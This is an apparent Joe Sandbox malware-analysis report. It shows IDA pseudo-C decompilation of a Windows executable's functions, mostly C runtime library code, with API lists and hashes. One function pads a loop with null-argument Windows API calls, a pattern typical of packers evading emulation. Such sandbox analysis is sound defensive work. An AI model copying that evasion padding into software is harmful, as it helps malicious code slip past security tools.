                                                                                                                                    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                                                                                                                                    				_t26 = _t36 - 0x50;
                                                                                                                                    				E00406F28(_t26, _t36 - 0x28);
                                                                                                                                    				E00409853(_t36 - 0x50, 0x41e7c8);
                                                                                                                                    				asm("int3");
                                                                                                                                    				E004097B4(E0041C1E4, _t36);
                                                                                                                                    				_push(_t26);
                                                                                                                                    				_push(__edi);
                                                                                                                                    				_t30 =  *((intOrPtr*)(_t36 + 8));
                                                                                                                                    				_t34 = _t26;
                                                                                                                                    				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
                                                                                                                                    				E00409151(_t26, _t30);
                                                                                                                                    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                                                                                                                                    				_t31 = _t30 + 0xc;
                                                                                                                                    				 *_t34 = 0x401538;
                                                                                                                                    				E00406EA9(_t34 + 0xc, _t30 + 0xc, _t31);
                                                                                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                                                                                                                                    				return _t34;
                                                                                                                                    			}







                                                                                                                                    0x004070ea
                                                                                                                                    0x004070fa
                                                                                                                                    0x004070ff
                                                                                                                                    0x00407107
                                                                                                                                    0x0040710a
                                                                                                                                    0x00407118
                                                                                                                                    0x0040711d
                                                                                                                                    0x00407123
                                                                                                                                    0x00407128
                                                                                                                                    0x0040712a
                                                                                                                                    0x0040712b
                                                                                                                                    0x0040712e
                                                                                                                                    0x00407131
                                                                                                                                    0x00407134
                                                                                                                                    0x00407139
                                                                                                                                    0x0040713d
                                                                                                                                    0x00407144
                                                                                                                                    0x0040714a
                                                                                                                                    0x00407156
                                                                                                                                    0x0040715e

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004070EA
                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0040710A
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00407118
                                                                                                                                      • Part of subcall function 00409853: RaiseException.KERNEL32(?,?,00409852,?,?,?,?,?,00409852,?,0041E594,0060EBE4), ref: 00409895
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionException@8H_prologRaiseThrowstd::bad_exception::bad_exception
                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                    • API String ID: 1606262581-3788999226
                                                                                                                                    • Opcode ID: c30a3e88ede54e683f741430551ea748ff07c6af3f55d711c02f248372f971bd
                                                                                                                                    • Instruction ID: e186cf5bfeb15b51790de72075a23c715ecd11600f081d6b563b0916e6969401
                                                                                                                                    • Opcode Fuzzy Hash: c30a3e88ede54e683f741430551ea748ff07c6af3f55d711c02f248372f971bd
                                                                                                                                    • Instruction Fuzzy Hash: 95D01272850109A6DB04F7E1CC46ADD7778AB14354F50403FF111730D7DB785A4C8A69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004188D5(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				char _v20;
                                                                                                                                    				signed int _t54;
                                                                                                                                    				intOrPtr _t56;
                                                                                                                                    				int _t57;
                                                                                                                                    				int _t58;
                                                                                                                                    				signed short* _t59;
                                                                                                                                    				short* _t60;
                                                                                                                                    				int _t65;
                                                                                                                                    				char* _t72;
                                                                                                                                    
                                                                                                                                    				_t72 = _a8;
                                                                                                                                    				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                    					L5:
                                                                                                                                    					return 0;
                                                                                                                                    				} else {
                                                                                                                                    					if( *_t72 != 0) {
                                                                                                                                    						E0040A140( &_v20, _a16);
                                                                                                                                    						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                                                                                                                                    							if(E00416FB8( *_t72 & 0x000000ff,  &_v20) == 0) {
                                                                                                                                    								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                                                                                                                                    									L10:
                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                    										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                    									}
                                                                                                                                    									return 1;
                                                                                                                                    								}
                                                                                                                                    								L21:
                                                                                                                                    								_t54 = E0040B128();
                                                                                                                                    								 *_t54 = 0x2a;
                                                                                                                                    								if(_v8 != 0) {
                                                                                                                                    									_t54 = _v12;
                                                                                                                                    									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                    								}
                                                                                                                                    								return _t54 | 0xffffffff;
                                                                                                                                    							}
                                                                                                                                    							_t56 = _v20;
                                                                                                                                    							_t65 =  *(_t56 + 0xac);
                                                                                                                                    							if(_t65 <= 1 || _a12 < _t65) {
                                                                                                                                    								L17:
                                                                                                                                    								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
                                                                                                                                    									goto L21;
                                                                                                                                    								} else {
                                                                                                                                    									goto L19;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                    								_t56 = _v20;
                                                                                                                                    								if(_t58 != 0) {
                                                                                                                                    									L19:
                                                                                                                                    									_t57 =  *(_t56 + 0xac);
                                                                                                                                    									if(_v8 == 0) {
                                                                                                                                    										return _t57;
                                                                                                                                    									}
                                                                                                                                    									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                    									return _t57;
                                                                                                                                    								}
                                                                                                                                    								goto L17;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t59 = _a4;
                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                    							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                    						}
                                                                                                                                    						goto L10;
                                                                                                                                    					} else {
                                                                                                                                    						_t60 = _a4;
                                                                                                                                    						if(_t60 != 0) {
                                                                                                                                    							 *_t60 = 0;
                                                                                                                                    						}
                                                                                                                                    						goto L5;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}














                                                                                                                                    0x004188df
                                                                                                                                    0x004188e6
                                                                                                                                    0x004188fd
                                                                                                                                    0x00000000
                                                                                                                                    0x004188ed
                                                                                                                                    0x004188ef
                                                                                                                                    0x00418909
                                                                                                                                    0x00418914
                                                                                                                                    0x00418946
                                                                                                                                    0x004189e4
                                                                                                                                    0x00418924
                                                                                                                                    0x00418927
                                                                                                                                    0x0041892c
                                                                                                                                    0x0041892c
                                                                                                                                    0x00000000
                                                                                                                                    0x00418932
                                                                                                                                    0x004189a6
                                                                                                                                    0x004189a6
                                                                                                                                    0x004189ab
                                                                                                                                    0x004189b4
                                                                                                                                    0x004189b6
                                                                                                                                    0x004189b9
                                                                                                                                    0x004189b9
                                                                                                                                    0x00000000
                                                                                                                                    0x004189bd
                                                                                                                                    0x00418948
                                                                                                                                    0x0041894b
                                                                                                                                    0x00418954
                                                                                                                                    0x0041897b
                                                                                                                                    0x00418984
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041895b
                                                                                                                                    0x0041896e
                                                                                                                                    0x00418976
                                                                                                                                    0x00418979
                                                                                                                                    0x0041898b
                                                                                                                                    0x0041898b
                                                                                                                                    0x00418994
                                                                                                                                    0x00418902
                                                                                                                                    0x00418902
                                                                                                                                    0x0041899d
                                                                                                                                    0x00000000
                                                                                                                                    0x0041899d
                                                                                                                                    0x00000000
                                                                                                                                    0x00418979
                                                                                                                                    0x00418954
                                                                                                                                    0x00418916
                                                                                                                                    0x0041891b
                                                                                                                                    0x00418921
                                                                                                                                    0x00418921
                                                                                                                                    0x00000000
                                                                                                                                    0x004188f1
                                                                                                                                    0x004188f1
                                                                                                                                    0x004188f6
                                                                                                                                    0x004188fa
                                                                                                                                    0x004188fa
                                                                                                                                    0x00000000
                                                                                                                                    0x004188f6
                                                                                                                                    0x004188ef

                                                                                                                                    APIs
                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00418909
                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 0041893D
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0041896E
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000000,00000000,00000000,?), ref: 004189DC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                    • Opcode ID: 2a126d981233f462acc6057b2cc6a5d50c48b1dfddd35f5694bdb02ff1a2ddc6
                                                                                                                                    • Instruction ID: 172624269cfd09389b57a2654defc521cc014f2b013edeb9d7204a9f6698ecfc
                                                                                                                                    • Opcode Fuzzy Hash: 2a126d981233f462acc6057b2cc6a5d50c48b1dfddd35f5694bdb02ff1a2ddc6
                                                                                                                                    • Instruction Fuzzy Hash: F231C071A20246EFDB20DF64C8809FE3BA5BF01310F14856EE4A59B291DB34DD81DB9A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E0041BE84(signed int __eax, signed int __ecx) {
                                                                                                                                    
                                                                                                                                    				asm("scasb");
                                                                                                                                    				_t2 = __eax | __ecx;
                                                                                                                                    				return E0040EB0D(_t2);
                                                                                                                                    			}



                                                                                                                                    0x0041be84
                                                                                                                                    0x0041be86
                                                                                                                                    0x0041be8c

                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,0041BFC2,?,0041F370,00000010,0041B357,00000000,?,?,?,00000000,?,00000000), ref: 0041BEDF
                                                                                                                                    • GetLastError.KERNEL32(?,0041BFC2,?,0041F370,00000010,0041B357,00000000,?,?,?,00000000,?,00000000,?,0041B3DD,?), ref: 0041BEE9
                                                                                                                                    • __free_osfhnd.LIBCMT ref: 0041BEF6
                                                                                                                                    • __dosmaperr.LIBCMT ref: 0041BF18
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr__free_osfhnd
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1721093958-0
                                                                                                                                    • Opcode ID: c308661fe686f3146a9776a75563da15ec329349988b5bf51e624fbe5f5f51c9
                                                                                                                                    • Instruction ID: c25a22a86741501ce81884b00b3b1ad6d167265e2980ada682666411a5af729f
                                                                                                                                    • Opcode Fuzzy Hash: c308661fe686f3146a9776a75563da15ec329349988b5bf51e624fbe5f5f51c9
                                                                                                                                    • Instruction Fuzzy Hash: 501104325143106AC2112729B849BEB7789DF52728F15016FFA14EB2D2DF69C9C246DD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0041BE8D(signed int _a4) {
                                                                                                                                    				intOrPtr _t20;
                                                                                                                                    				void* _t24;
                                                                                                                                    				long _t32;
                                                                                                                                    				signed int _t34;
                                                                                                                                    
                                                                                                                                    				_t34 = _a4;
                                                                                                                                    				if(E00418FC9(_t34) == 0xffffffff) {
                                                                                                                                    					L8:
                                                                                                                                    					_t32 = 0;
                                                                                                                                    					L9:
                                                                                                                                    					E00418F43(_t34);
                                                                                                                                    					 *((char*)( *((intOrPtr*)(0x60f7c0 + (_t34 >> 5) * 4)) + ((_t34 & 0x0000001f) << 6) + 4)) = 0;
                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                    						return 0;
                                                                                                                                    					}
                                                                                                                                    					return E0040B14E(_t32) | 0xffffffff;
                                                                                                                                    				}
                                                                                                                                    				_t20 =  *0x60f7c0;
                                                                                                                                    				if(_t34 != 1 || ( *(_t20 + 0x84) & 0x00000001) == 0) {
                                                                                                                                    					if(_t34 != 2 || ( *(_t20 + 0x44) & 0x00000001) == 0) {
                                                                                                                                    						goto L6;
                                                                                                                                    					} else {
                                                                                                                                    						goto L5;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					L5:
                                                                                                                                    					_t24 = E00418FC9(2);
                                                                                                                                    					if(E00418FC9(1) == _t24) {
                                                                                                                                    						goto L8;
                                                                                                                                    					}
                                                                                                                                    					L6:
                                                                                                                                    					if(CloseHandle(E00418FC9(_t34)) != 0) {
                                                                                                                                    						goto L8;
                                                                                                                                    					}
                                                                                                                                    					_t32 = GetLastError();
                                                                                                                                    					goto L9;
                                                                                                                                    				}
                                                                                                                                    			}







                                                                                                                                    0x0041be93
                                                                                                                                    0x0041bea1
                                                                                                                                    0x0041bef3
                                                                                                                                    0x0041bef3
                                                                                                                                    0x0041bef5
                                                                                                                                    0x0041bef6
                                                                                                                                    0x0041bf0e
                                                                                                                                    0x0041bf15
                                                                                                                                    0x00000000
                                                                                                                                    0x0041bf23
                                                                                                                                    0x00000000
                                                                                                                                    0x0041bf1e
                                                                                                                                    0x0041bea3
                                                                                                                                    0x0041beab
                                                                                                                                    0x0041beb9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041bec1
                                                                                                                                    0x0041bec1
                                                                                                                                    0x0041bec3
                                                                                                                                    0x0041bed5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041bed7
                                                                                                                                    0x0041bee7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041beef
                                                                                                                                    0x00000000
                                                                                                                                    0x0041beef

                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,0041BFC2,?,0041F370,00000010,0041B357,00000000,?,?,?,00000000,?,00000000), ref: 0041BEDF
                                                                                                                                    • GetLastError.KERNEL32(?,0041BFC2,?,0041F370,00000010,0041B357,00000000,?,?,?,00000000,?,00000000,?,0041B3DD,?), ref: 0041BEE9
                                                                                                                                    • __free_osfhnd.LIBCMT ref: 0041BEF6
                                                                                                                                    • __dosmaperr.LIBCMT ref: 0041BF18
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr__free_osfhnd
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1721093958-0
                                                                                                                                    • Opcode ID: fbba2220e05ee284fa21b4b66aa382df9769a67b1816377b7be7a873b3410710
                                                                                                                                    • Instruction ID: fd47e98d0e6c5d86c612e4acb90036842b70eeddf334681ca8c3c4255e836a0b
                                                                                                                                    • Opcode Fuzzy Hash: fbba2220e05ee284fa21b4b66aa382df9769a67b1816377b7be7a873b3410710
                                                                                                                                    • Instruction Fuzzy Hash: B40104335082505AD221273AAC49BEB2745DB91734F26016FFA14DB2D2DF68C9C245DD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                    			E004048AF(unsigned int* _a4, unsigned int _a8, signed int _a12) {
                                                                                                                                    				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                    				unsigned int _t6;
                                                                                                                                    				void* _t7;
                                                                                                                                    				unsigned int _t13;
                                                                                                                                    				unsigned int* _t16;
                                                                                                                                    
                                                                                                                                    				if( *0x60e9b0 == 0x516) {
                                                                                                                                    					__imp__MoveFileWithProgressW(0, 0, 0, 0, 0);
                                                                                                                                    				}
                                                                                                                                    				_t6 = _a8 >> 3;
                                                                                                                                    				if(_t6 > 0) {
                                                                                                                                    					_t16 = _a4;
                                                                                                                                    					_t13 = _t6;
                                                                                                                                    					do {
                                                                                                                                    						if( *0x60e9b0 == 0x29) {
                                                                                                                                    							CopyFileExA(0, 0, 0, 0, 0, 0);
                                                                                                                                    						}
                                                                                                                                    						if( *0x60e9b0 == 0x1c) {
                                                                                                                                    							FindNextFileA(0,  &_v324);
                                                                                                                                    							EnumSystemCodePagesA(0, 0);
                                                                                                                                    						}
                                                                                                                                    						_t7 = E004046E7(_t16, _a12);
                                                                                                                                    						_t16 = _t16 + 8;
                                                                                                                                    						_t13 = _t13 - 1;
                                                                                                                                    					} while (_t13 != 0);
                                                                                                                                    					return _t7;
                                                                                                                                    				}
                                                                                                                                    				return _t6;
                                                                                                                                    			}








                                                                                                                                    0x004048c5
                                                                                                                                    0x004048cc
                                                                                                                                    0x004048cc
                                                                                                                                    0x004048d5
                                                                                                                                    0x004048da
                                                                                                                                    0x004048de
                                                                                                                                    0x004048e1
                                                                                                                                    0x004048e3
                                                                                                                                    0x004048ea
                                                                                                                                    0x004048f2
                                                                                                                                    0x004048f2
                                                                                                                                    0x004048ff
                                                                                                                                    0x00404909
                                                                                                                                    0x00404911
                                                                                                                                    0x00404911
                                                                                                                                    0x0040491b
                                                                                                                                    0x00404920
                                                                                                                                    0x00404923
                                                                                                                                    0x00404923
                                                                                                                                    0x00000000
                                                                                                                                    0x00404927
                                                                                                                                    0x0040492a

                                                                                                                                    APIs
                                                                                                                                    • MoveFileWithProgressW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004048CC
                                                                                                                                    • CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004048F2
                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00404909
                                                                                                                                    • EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 00404911
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CodeCopyEnumFindMoveNextPagesProgressSystemWith
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1451279008-0
                                                                                                                                    • Opcode ID: 86205beb5af28ff2a788f51e74589422b16a8b0c1284da450be411214349e86d
                                                                                                                                    • Instruction ID: e1ee0e235db30e1f37307fe39cab68e3bab75aaef9d8602fc2b367319537873f
                                                                                                                                    • Opcode Fuzzy Hash: 86205beb5af28ff2a788f51e74589422b16a8b0c1284da450be411214349e86d
                                                                                                                                    • Instruction Fuzzy Hash: 25F0C876402164EBC7117B61DD448AF776CFF99352B00453AF605A2160D3394941C7A8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040FB51(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                    				intOrPtr _t25;
                                                                                                                                    				void* _t26;
                                                                                                                                    				void* _t28;
                                                                                                                                    
                                                                                                                                    				_t25 = _a16;
                                                                                                                                    				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                    					_t26 = E0040F442(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                    					goto L9;
                                                                                                                                    				} else {
                                                                                                                                    					_t34 = _t25 - 0x66;
                                                                                                                                    					if(_t25 != 0x66) {
                                                                                                                                    						__eflags = _t25 - 0x61;
                                                                                                                                    						if(_t25 == 0x61) {
                                                                                                                                    							L7:
                                                                                                                                    							_t26 = E0040F532(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                    						} else {
                                                                                                                                    							__eflags = _t25 - 0x41;
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								goto L7;
                                                                                                                                    							} else {
                                                                                                                                    								_t26 = E0040FA57(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L9:
                                                                                                                                    						return _t26;
                                                                                                                                    					} else {
                                                                                                                                    						return E0040F99C(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}






                                                                                                                                    0x0040fb56
                                                                                                                                    0x0040fb5c
                                                                                                                                    0x0040fbcf
                                                                                                                                    0x00000000
                                                                                                                                    0x0040fb63
                                                                                                                                    0x0040fb63
                                                                                                                                    0x0040fb66
                                                                                                                                    0x0040fb81
                                                                                                                                    0x0040fb84
                                                                                                                                    0x0040fba4
                                                                                                                                    0x0040fbb6
                                                                                                                                    0x0040fb86
                                                                                                                                    0x0040fb86
                                                                                                                                    0x0040fb89
                                                                                                                                    0x00000000
                                                                                                                                    0x0040fb8b
                                                                                                                                    0x0040fb9d
                                                                                                                                    0x0040fb9d
                                                                                                                                    0x0040fb89
                                                                                                                                    0x0040fbd4
                                                                                                                                    0x0040fbd8
                                                                                                                                    0x0040fb68
                                                                                                                                    0x0040fb80
                                                                                                                                    0x0040fb80
                                                                                                                                    0x0040fb66

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                    • Instruction ID: 2d7a2fb2cdbd8afa8c4a82265768fa0519520519118ae7b76fed703eda41eed5
                                                                                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                    • Instruction Fuzzy Hash: A211303200014EBBCF225E85CC51CEE3F32BB18354B598476FA1869971D37AD976AF85
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E0040B69C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				signed int _t13;
                                                                                                                                    				intOrPtr _t27;
                                                                                                                                    				intOrPtr _t29;
                                                                                                                                    				void* _t30;
                                                                                                                                    				void* _t31;
                                                                                                                                    
                                                                                                                                    				_t31 = __eflags;
                                                                                                                                    				_t26 = __edi;
                                                                                                                                    				_t25 = __edx;
                                                                                                                                    				_t22 = __ebx;
                                                                                                                                    				_push(0xc);
                                                                                                                                    				_push(0x41ee78);
                                                                                                                                    				E0040EAC8(__ebx, __edi, __esi);
                                                                                                                                    				_t29 = E0040DABC(__ebx, __edx, _t31);
                                                                                                                                    				_t13 =  *0x4b3df8; // 0xfffffffe
                                                                                                                                    				if(( *(_t29 + 0x70) & _t13) == 0) {
                                                                                                                                    					L6:
                                                                                                                                    					E0040DFCF(_t22, _t26, 0xc);
                                                                                                                                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                                                                                                                    					_t8 = _t29 + 0x6c; // 0x6c
                                                                                                                                    					_t27 =  *0x4b3ee0; // 0x4b3e08
                                                                                                                                    					 *((intOrPtr*)(_t30 - 0x1c)) = E0040B65E(_t8, _t27);
                                                                                                                                    					 *(_t30 - 4) = 0xfffffffe;
                                                                                                                                    					E0040B706();
                                                                                                                                    				} else {
                                                                                                                                    					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                                                                                                                                    					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                                                                                                                                    						goto L6;
                                                                                                                                    					} else {
                                                                                                                                    						_t29 =  *((intOrPtr*)(E0040DABC(_t22, __edx, _t33) + 0x6c));
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                    					E0040FCDF(_t25, 0x20);
                                                                                                                                    				}
                                                                                                                                    				return E0040EB0D(_t29);
                                                                                                                                    			}








                                                                                                                                    0x0040b69c
                                                                                                                                    0x0040b69c
                                                                                                                                    0x0040b69c
                                                                                                                                    0x0040b69c
                                                                                                                                    0x0040b69c
                                                                                                                                    0x0040b69e
                                                                                                                                    0x0040b6a3
                                                                                                                                    0x0040b6ad
